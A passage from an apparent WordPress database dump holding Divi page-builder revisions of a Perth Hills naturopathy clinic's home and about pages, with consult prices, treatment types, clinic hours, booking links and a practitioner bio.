\'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_url=\"https://verde-health.au2.cliniko.com/bookings\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 13:08:02','2021-05-27 05:08:02','',28,'https://verdenaturopathy.com.au/?p=210',0,'revision','',0),(215,1,'2021-05-27 13:24:57','2021-05-27 05:24:57','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01-large.png\" title_text=\"1-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 13:24:57','2021-05-27 05:24:57','',28,'https://verdenaturopathy.com.au/?p=215',0,'revision','',0),(250,1,'2021-05-27 21:19:06','2021-05-27 13:19:06','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" 